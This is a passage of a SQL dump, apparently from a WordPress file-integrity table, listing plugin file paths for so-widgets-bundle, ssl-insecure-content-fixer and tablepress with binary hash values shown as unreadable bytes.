!T','',0,'?'),('fq0b9','wp-content/plugins/so-widgets-bundle/widgets/price-table/assets/banner.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nMT$_+rO','\'	lY=\r?ۧZU','',0,'?'),(']qi	','wp-content/plugins/so-widgets-bundle/widgets/price-table/js/pricetable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w/U0\n\\/璼U','j=qovTr\'AˎޞM','',0,'?'),('HDՊa?20Lc','wp-content/plugins/so-widgets-bundle/widgets/price-table/js/pricetable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G2̚l','Fc	{mRDF.nT','',0,'?'),('\'sAZk_fR)','wp-content/plugins/so-widgets-bundle/widgets/price-table/price-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O)\0)؊','\ZNщC&H{H##RPMچl','',0,'?'),('jt1t,=Us','wp-content/plugins/so-widgets-bundle/widgets/price-table/styles/atom.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}j$O17j&','%Ax`놋ϱ!EF','',0,'?'),('<m:5x','wp-content/plugins/so-widgets-bundle/widgets/price-table/tpl/atom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k/Ь','4X:bK݈?llnm|','',0,'?'),('7יB8J','wp-content/plugins/so-widgets-bundle/widgets/simple-masonry/assets/banner.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':1(3뎧','	?	K\\|JۆADo(Iz<0h','',0,'?'),('L<$Gr\Z/','wp-content/plugins/so-widgets-bundle/widgets/simple-masonry/js/simple-masonry.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PR&nn','Ś2,[n߲&i.p!Р','',0,'?'),(':Q%Zrdv','wp-content/plugins/so-widgets-bundle/widgets/simple-masonry/js/simple-masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p\r\\6TV8{','gm~KUt(Ԟo8R|e','',0,'?'),('&/	oTԴ8','wp-content/plugins/so-widgets-bundle/widgets/simple-masonry/simple-masonry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C#\0:wS','*̝cA\0T#3:㛈׹Wz	Y','',0,'?'),(' ѐTKZTvz<','wp-content/plugins/so-widgets-bundle/widgets/simple-masonry/styles/default.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','od()jq|_N*','-JH}EWjc33BC6qR[eI3','',0,'?'),('Ӱ(l[\nN:','wp-content/plugins/so-widgets-bundle/widgets/simple-masonry/tpl/default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gh\0FD;>','\0jZJَr9owZ-4jP!d`a`3m','',0,'?'),('vc}Rou!jLa','wp-content/plugins/so-widgets-bundle/widgets/slider/assets/banner.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1~[wA޹',']QT{\ZXimOyv?iy4?e','',0,'?'),('E3ZRû\"$','wp-content/plugins/so-widgets-bundle/widgets/slider/slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b!#','uّrׁzĘdγq\',14M','',0,'?'),('秺oK9','wp-content/plugins/so-widgets-bundle/widgets/slider/styles/default.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tiu,T','I\ZZ=jWSm+/\r܇J\"nϒb','',0,'?'),('o>yd%`26T','wp-content/plugins/so-widgets-bundle/widgets/slider/tpl/default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3.HGygj%','aUz2d5S\Z-߯(Rqg֪','',0,'?'),(' &Cp!','wp-content/plugins/so-widgets-bundle/widgets/social-media-buttons/assets/banner.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(zoM%j.!','{+:$% \\Oor˼','',0,'?'),('+{n','wp-content/plugins/so-widgets-bundle/widgets/social-media-buttons/data/networks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	{Wod','䠮B]=u)3_p+o]f,\"z','',0,'?'),('HuG!%','wp-content/plugins/so-widgets-bundle/widgets/social-media-buttons/js/social-media-buttons-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&tK26',',d~g58fk>OoǎR\"','',0,'?'),('RԽQ78k','wp-content/plugins/so-widgets-bundle/widgets/social-media-buttons/js/social-media-buttons-admin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bqx0\\UWπ','_;dL3\'&$/Wy3D','',0,'?'),('wl	|ŝ','wp-content/plugins/so-widgets-bundle/widgets/social-media-buttons/social-media-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*Z.Q.\'','JxV}kLZ;v/tӥY\08`','',0,'?'),('y\n;51H','wp-content/plugins/so-widgets-bundle/widgets/social-media-buttons/styles/atom.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5\ZÇ%H{(KX','+Rzn	$Se</=Yq\0CU{','',0,'?'),('B\\RT4+\\1e','wp-content/plugins/so-widgets-bundle/widgets/social-media-buttons/styles/flat.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','٧0Z\n	','e.æ	yY\0j>\Zq\np0~','',0,'?'),('xz9XZa4[a','wp-content/plugins/so-widgets-bundle/widgets/social-media-buttons/styles/widget-mixins.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9g\"',':|n\n95L|tŅw-','',0,'?'),('>1ࡥ֩Sd','wp-content/plugins/so-widgets-bundle/widgets/social-media-buttons/styles/wire.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0=쑳ri','0 G#?>HIO]qFa trAD','',0,'?'),('SbI!׵j	','wp-content/plugins/so-widgets-bundle/widgets/social-media-buttons/tpl/default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[.tĿz','S`|kNAf\r/(gE_чY\n','',0,'?'),('\\t\\UKp{','wp-content/plugins/so-widgets-bundle/widgets/tabs/assets/banner.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&T۪=NzB','\"*[/cY/Pj_%;@ǅv','',0,'?'),('	$`3CҾ8','wp-content/plugins/so-widgets-bundle/widgets/tabs/js/tabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t/Й1','Ů0hbe#&\rD;V$H','',0,'?'),('pʻ25N','wp-content/plugins/so-widgets-bundle/widgets/tabs/js/tabs.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0f/`Qc3','w_hmnE!˞h&:','',0,'?'),('p~;Ī4','wp-content/plugins/so-widgets-bundle/widgets/tabs/styles/default.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?jI aaʔuj','$j@w~{`%~|G!.O','',0,'?'),('(Stf?','wp-content/plugins/so-widgets-bundle/widgets/tabs/tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~,\\}5fO','¨Xu%}$ [DCQ1UU','',0,'?'),('60EeH\0p','wp-content/plugins/so-widgets-bundle/widgets/tabs/tpl/default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̔_[ލ@5','&AxynRD6vPL%xL\"','',0,'?'),('v`h:\ZLJM!','wp-content/plugins/so-widgets-bundle/widgets/taxonomy/assets/banner.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eω+qp4','Q\ZKl+>ÚE{ZߕEs','',0,'?'),('FUW JI','wp-content/plugins/so-widgets-bundle/widgets/taxonomy/styles/default.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5QCŒJk?','p(6%wO꣫SV_Ee$t','',0,'?'),('Z8v~HS3b&Y','wp-content/plugins/so-widgets-bundle/widgets/taxonomy/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yBV2߃-\"','Et;zmFuSh_DJ*ʫ','',0,'?'),(']nH.`aK1)_','wp-content/plugins/so-widgets-bundle/widgets/taxonomy/tpl/default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!lŖn!`','A0az4hJ\0`]+Bu[\0','',0,'?'),('\\&ybQiI?6','wp-content/plugins/so-widgets-bundle/widgets/testimonial/assets/banner.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǴUʶ4Q51P','p#ɐ**g_~kKT\0Eb=J|','',0,'?'),('m(?Jd','wp-content/plugins/so-widgets-bundle/widgets/testimonial/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	Z_>=\0','7%:.Bߛ,:nqr=osr|','',0,'?'),('&5jY>9J','wp-content/plugins/so-widgets-bundle/widgets/testimonial/styles/default.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6$viO#.','zhŸb\0.>0тA% pY!A','',0,'?'),('yk5쯂_P>','wp-content/plugins/so-widgets-bundle/widgets/testimonial/svg/svgdefs.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*Pf/lb*[','%;\"[\"cܛB=.l\r]A','',0,'?'),('\ZY2g','wp-content/plugins/so-widgets-bundle/widgets/testimonial/testimonial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':6~B|Xa#l','=OV<^~,#.(	蠑)','',0,'?'),(':j7f#D!Is','wp-content/plugins/so-widgets-bundle/widgets/testimonial/tpl/default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Uh.@ڸ','FK7޿IKS!pAT+','',0,'?'),('ݙ\ZDc42>','wp-content/plugins/so-widgets-bundle/widgets/video/assets/banner.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"՞NP','̖,ˡLݟ,{7@L\0','',0,'?'),('\rkqF8؇Q5','wp-content/plugins/so-widgets-bundle/widgets/video/css/controls-skin.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hNb0u%dp','E9V~QfFם`?K-7\'m','',0,'?'),('ۂjD-P~	+','wp-content/plugins/so-widgets-bundle/widgets/video/css/html-player-responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g,8Q9:G','\ZGX0^^Bk-f2Tzi-0','',0,'?'),('3;Y\'58~L','wp-content/plugins/so-widgets-bundle/widgets/video/css/skin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(/`~flU','BbNco9k֜p\n]ZW\"@@M%ai','',0,'?'),('xHTӵ{ssiзN','wp-content/plugins/so-widgets-bundle/widgets/video/js/so-video-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3E|͗n!	dy(S','\"byME\'.:8Uo.]IS','',0,'?'),('7sCʀ/5͟','wp-content/plugins/so-widgets-bundle/widgets/video/js/so-video-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!\\9E[','U&+YJdO4{FC},Q','',0,'?'),('ةy^Na','wp-content/plugins/so-widgets-bundle/widgets/video/tpl/default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SpK92M\r','\"hu;do@8l#g.J9ODʝ','',0,'?'),('uw1MsT<\n','wp-content/plugins/so-widgets-bundle/widgets/video/video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N|/\nKLPbt','O)NӾ	/ހV ','',0,'?'),('&%tv','wp-content/plugins/ssl-insecure-content-fixer/changelog.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!zJ|! cv\Z','rӼWdG0<͔!{٨H','',0,'?'),('\nΎΑL	<S','wp-content/plugins/ssl-insecure-content-fixer/css/settings.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vuj<','PXk%򂝺kwhX4','',0,'?'),('i2V	`0','wp-content/plugins/ssl-insecure-content-fixer/css/tests.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&s\"\r+:oJ	:','E#*eIuY15hи*ի','',0,'?'),('BIG&K\r՛Q:5','wp-content/plugins/ssl-insecure-content-fixer/images/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8t)[!','Ζ([5*Jѝs\\wkWda5','',0,'?'),('S,:\'&','wp-content/plugins/ssl-insecure-content-fixer/includes/class.SSLInsecureContentFixer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NbINɫ<o>','|2H#ۥ?I/Ŋ:O','',0,'?'),('#0,٨W','wp-content/plugins/ssl-insecure-content-fixer/includes/class.SSLInsecureContentFixerAdmin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p*R#','<#\nA8m}ߎPJrbD','',0,'?'),('G Qt','wp-content/plugins/ssl-insecure-content-fixer/includes/nonces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rt8ؽwɬj','ׇR!{lZO8zb;hb','',0,'?'),('(\\[Fb','wp-content/plugins/ssl-insecure-content-fixer/js/admin-settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']y>\n	)O',')y\ZF$}U-\0ݷH\n','',0,'?'),('h]M\"j','wp-content/plugins/ssl-insecure-content-fixer/js/admin-settings.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X<XKY:\"5','+=pE/q]lQO|','',0,'?'),('nb(0>Xy','wp-content/plugins/ssl-insecure-content-fixer/js/admin-tests.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T	a0?-`<+','6Zf?~t$zj\"T S','',0,'?'),('KjC5o x@շ','wp-content/plugins/ssl-insecure-content-fixer/js/admin-tests.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+1RNu','8?KuŎKAߙ)[=֓+u','',0,'?'),('$Pќp6@','wp-content/plugins/ssl-insecure-content-fixer/nowp/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z⎞iio','3t4xdt1!\"','',0,'?'),('xdb~9\'҇','wp-content/plugins/ssl-insecure-content-fixer/nowp/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rQxlܞb','؀7lOKRƠ\'%bX=SyiJE','',0,'?'),('tId·濧%	','wp-content/plugins/ssl-insecure-content-fixer/readme.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j[s=#[Z]}','lt<>r,Zf6','',0,'?'),('=wpyrnSi7','wp-content/plugins/ssl-insecure-content-fixer/readme.txt',0,'m`>uW-	','m`>uW-	','Pb~Mm*.\\5 8f7(\Zjq','',0,'?'),('zx)I','wp-content/plugins/ssl-insecure-content-fixer/ssl-insecure-content-fixer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_aB\"','ZE.ڌ\\@/^*g$hgs','',0,'?'),('V[j W-YWi','wp-content/plugins/ssl-insecure-content-fixer/views/requires-extensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k.ZTEi','UzFfQ%`I\nUEEAQ\\','',0,'?'),('z1N)\rxk','wp-content/plugins/ssl-insecure-content-fixer/views/requires-pcre.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pyY5׵H','A_3ka?N .\\TFY	x','',0,'?'),('|\\p^','wp-content/plugins/ssl-insecure-content-fixer/views/script-force-https.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZV;\0Cmi\"','f7~2+R=@(K$\'\r1','',0,'?'),('Kɕ>T	','wp-content/plugins/ssl-insecure-content-fixer/views/settings-fields-common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ls\'\\Dˉ?','yv+v!Bvֽ|N\Zo:U\"','',0,'?'),('R\\\0B&b','wp-content/plugins/ssl-insecure-content-fixer/views/settings-form-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n5b|Ϧ','i8|FHfV+?_I?R1	39ns','',0,'?'),('їNuxJ>','wp-content/plugins/ssl-insecure-content-fixer/views/settings-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mkg;\n','\n\\6jswy|q}TEQJl궩w','',0,'?'),('ÒM	1\r\0\Z\r8CE','wp-content/plugins/ssl-insecure-content-fixer/views/ssl-tests.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ђ~sP%0','j?$Hu-Wj.] &#','',0,'?'),('Oijq1ON','wp-content/plugins/tablepress/admin/css/codemirror.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','꒲t)&','Vz\0\r<9[)4(Fa$','',0,'?'),('\Zв t4\" Kj','wp-content/plugins/tablepress/admin/css/codemirror.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G;q\0cv','lړz)QyށQAN 5r','',0,'?'),('\'i}L4Ƨ','wp-content/plugins/tablepress/admin/css/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p֛͇;','./DIHPG@-&\ZXn','',0,'?'),('M_zjJS','wp-content/plugins/tablepress/admin/css/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G|m','1ؠiqBR>ӠdMe(_~[','',0,'?'),('5sgU曭x#x','wp-content/plugins/tablepress/admin/css/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f=Ӥ)\"yc','B;\\·?o\Zn+','',0,'?'),('R/X}\'i%','wp-content/plugins/tablepress/admin/css/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m԰V],\n)X>','fuSL 	,#.qCͷ*','',0,'?'),('-,FN;,|Of','wp-content/plugins/tablepress/admin/css/edit.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i7\Z6io&r9','Ņ%ӎZ.};\r\\\Z7','',0,'?'),('LcwƼNwji','wp-content/plugins/tablepress/admin/css/edit.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*:%{;Zm#O','3f+{u%<3ghW','',0,'?'),('wT\\d`','wp-content/plugins/tablepress/admin/css/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),('wfc{BzBQ	M\\','wp-content/plugins/tablepress/admin/img/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),('=EClXΰ','wp-content/plugins/tablepress/admin/img/tablepress-editor-button-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sej햸','PDlA:r~ESJ05','',0,'?'),('g\0&REF','wp-content/plugins/tablepress/admin/img/tablepress-editor-button.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','96-3J\rD','H/_v,\\11s.Y9{)\ZhG)2','',0,'?'),('UBޥxP6W:)R','wp-content/plugins/tablepress/admin/img/wsal-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%y','>mOdf\'te{JESX_}','',0,'?'),('yd7ы/|_E','wp-content/plugins/tablepress/admin/img/wsal-mark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ws;Fd6̽','8N{I:\re.I?','',0,'?'),('WS\nZ8','wp-content/plugins/tablepress/admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),('\0鋛/eS','wp-content/plugins/tablepress/admin/js/add.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!k3Zs8G!%','wB	o`IQl\0/QDɃ.>睸:+','',0,'?'),('w	\rC%7_wo','wp-content/plugins/tablepress/admin/js/add.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݙ#05=\r','OfH9nK]3($feV','',0,'?'),('7[1B_K_','wp-content/plugins/tablepress/admin/js/codemirror.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fWBDn','ΤYډpp|OOL\n-Y','',0,'?'),('Xw)\\*2[e','wp-content/plugins/tablepress/admin/js/codemirror.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!9NC/Z@K','y{)DdތhiP47','',0,'?'),('!9y6!p','wp-content/plugins/tablepress/admin/js/common.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y&*OX,4çd','Fq\rj+ǴJ!CǺA}MVs΋','',0,'?'),('!P3Iqz$','wp-content/plugins/tablepress/admin/js/common.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6*M1c<','\rm?yoEYRZ~v\\d','',0,'?'),('DPQ,(+|ذ','wp-content/plugins/tablepress/admin/js/edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pV\'.','7l^NBtmh~շ1(','',0,'?'),('*T\'\"+i','wp-content/plugins/tablepress/admin/js/edit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cDL>ߠՃ\"',';oQ<LGۛ}JG4U80e','',0,'?'),('Y&O\ZX','wp-content/plugins/tablepress/admin/js/export.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#,E\'e:','C3」GOYBЉ8yT','',0,'?'),('D0Y/Cel','wp-content/plugins/tablepress/admin/js/export.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?YN%sut','C*5N`Ӕ}S5AH','',0,'?'),('8XIRfDӝ','wp-content/plugins/tablepress/admin/js/import.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^Ѧ)Üv׋','^X#F[\"l	','',0,'?'),('14R(UG?[\"','wp-content/plugins/tablepress/admin/js/import.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wcc`dIڽv','h[<uk`VM%B!!NN}oj','',0,'?'),('5iҘ0~fP','wp-content/plugins/tablepress/admin/js/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),('av<01JI','wp-content/plugins/tablepress/admin/js/list.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','00y&աa& 0','M0TY<\"[b%yr?Xgt?','',0,'?'),('8pϾ7U I','wp-content/plugins/tablepress/admin/js/list.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tSuU','Kt)dW}dU^\0pV=Ptm\r','',0,'?'),('ZL/ÎmG','wp-content/plugins/tablepress/admin/js/options.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[/T.-2EX#:XiG','%aLd}\r{媙)KeܞnOK^-GR','',0,'?'),('{\"_enՑ','wp-content/plugins/tablepress/admin/js/options.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N#``Qw','Y9Vx]pG!W3z.^R','',0,'?'),('\0u#	oU','wp-content/plugins/tablepress/admin/js/quicktags-button.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';T[aՈH','W:ArRKj* z\Z\\3|','',0,'?'),('4Cs\'_','wp-content/plugins/tablepress/admin/js/quicktags-button.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jؘ1:N E9dG53','w?{3YRz;,ib0Vcy@N\\','',0,'?'),('gR<}y:1T','wp-content/plugins/tablepress/admin/js/tinymce-button.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G1 N$#&\0\\?','tݬ8O\\FɐK\rmY@(n\0c','',0,'?'),('H0	Zk?]qO','wp-content/plugins/tablepress/admin/js/tinymce-button.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wp/zE5W','C)#gnE*^@JR,6_','',0,'?'),('bpyT5S,L','wp-content/plugins/tablepress/classes/class-admin-page-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']1t#LN','k_*ގG`+}/|P1>ZӢ','',0,'?'),('JoBֺ*9bX','wp-content/plugins/tablepress/classes/class-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','se6OU(\nKp','>ȁ\\Nrrjz5Eى|;7x','',0,'?'),('ԭ#_B\Z&i','wp-content/plugins/tablepress/classes/class-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hnǛ=\\F','\\$0+o[c;aL','',0,'?'),('\0+زU[l45','wp-content/plugins/tablepress/classes/class-evaluate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R^yoO?Ɨ=','1\\oo@gUe\rwE#','',0,'?'),('=Gف','wp-content/plugins/tablepress/classes/class-export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0+\ZJCsј;T','ѐ{ucEG)j0j\"C\0','',0,'?'),('VO~FM\"/U8','wp-content/plugins/tablepress/classes/class-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|lФlā[a','a_AͣZUl<҇_','',0,'?'),('b,x0ɣEL','wp-content/plugins/tablepress/classes/class-model.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!u\\1UQuR#qt','m=YyoU0=0Jcd\"[ܡj','',0,'?'),('dAN10u3(\"\0','wp-content/plugins/tablepress/classes/class-render.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LG̙ᨽ,l\\','v:2PO\'Emɷ0FɅ,j','',0,'?'),('ث1<qd``hj:G','wp-content/plugins/tablepress/classes/class-tablepress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MYN H','.\ZP߾pgMMXћn;jC','',0,'?'),('܈C<.={*','wp-content/plugins/tablepress/classes/class-view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P]}y1yл',' Txp@_R$Go}aH\nGE','',0,'?'),('x̜q%o','wp-content/plugins/tablepress/classes/class-wp_option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O*C2KR','i\n},DO?ß-R`hTQ mOxҙ','',0,'?'),('*_QkTj$','wp-content/plugins/tablepress/classes/class-wp_user_option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Sg=L\Z\Z˙','eý0L+E0,[','',0,'?'),('J.ttL5','wp-content/plugins/tablepress/classes/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),(':ZՕz\nд','wp-content/plugins/tablepress/controllers/controller-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZF)!-`uT]','Ъi<>ѧgR4','',0,'?'),('5Xc\n$xX','wp-content/plugins/tablepress/controllers/controller-admin_ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㵒;Fț;G','J|\r }wBlaU @z8}','',0,'?'),('?}l5v!;','wp-content/plugins/tablepress/controllers/controller-frontend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','svѱW\"YK|n\n','^adeo73}4','',0,'?'),('&>4R','wp-content/plugins/tablepress/controllers/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),('4@,C׏','wp-content/plugins/tablepress/controllers/template-tag-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GJCMr+ý','QQaltv%8qÍLUi','',0,'?'),('fNHjb՞-.-D','wp-content/plugins/tablepress/css/default-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v0>Xwf','l~#bØ9k:#짓l','',0,'?'),('P,&c7*nb','wp-content/plugins/tablepress/css/default-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D{Lu^','T^9tx??3\\)Jh','',0,'?'),('Wv~q\nQ','wp-content/plugins/tablepress/css/default.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S\"[KW','_X3Ϟ;*:A1leF:8gAC*','',0,'?'),('P=)Rc+ v','wp-content/plugins/tablepress/css/default.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2<nVha\nˠ5\rJ','y\\J}U\r]ZhD|6NSK','',0,'?'),('.LĂ:f','wp-content/plugins/tablepress/css/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),('2\\W7si','wp-content/plugins/tablepress/css/tablepress.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']7(k(UnXx+','6\0Y,ȣd#q	uo','',0,'?'),('^}\n^)T`w','wp-content/plugins/tablepress/css/tablepress.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E*rx ?ĤW\r,','`F56+32HT2C9]3w/?\n','',0,'?'),('ZcT܍(D2','wp-content/plugins/tablepress/css/warning.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2ǀhba','vgO]B~g}\"m&6_','',0,'?'),('CqzoZZBK','wp-content/plugins/tablepress/i18n/datatables/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aVqM','k~	UH\ZxPĀ<;X','',0,'?'),('Wmh~s